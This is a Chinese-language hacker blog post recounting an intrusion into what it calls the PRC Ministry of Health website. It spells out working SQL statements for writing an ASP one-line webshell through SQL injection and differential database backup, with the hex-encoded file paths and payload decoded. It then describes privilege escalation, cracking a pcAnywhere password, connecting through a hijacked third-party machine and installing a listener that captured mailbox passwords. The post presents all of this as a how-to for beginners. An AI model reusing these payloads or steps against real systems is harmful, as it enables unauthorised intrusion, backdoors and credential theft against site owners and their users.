上了hao123,随便点了饿一下,发现是个大站,中华人民共和国卫生部网站,挺大
是asp.net做的,照搞不误,
提交单引号出错,凭经验判断可以注入。
开工,发现是dbo权限,有点低哦!后太有ip限制,403错误。
就差异备份下小木马。着个比较简单哦,
利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a")%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
网管联盟bitsCN@com 着里的路径我们用nbsi列目录就ok了!
好想小路这家伙写了个小工具,跟简单好用!
进了,提升权限,发现了pcanywhere,用个小根据破下密码。
我没装pcanywhere,就上我的一只台湾肉鸡,连上去了。
看时间,也就20来分钟吧!
装了个监听器,有两个油箱密码,没什么好玩的,肉鸡多了不好!
在他们主页上提醒下管理员,在他桌面上留防注入的代码。
结束,闪人。
本来想写详细点,为菜鸟写篇经典文章,
评论加载中…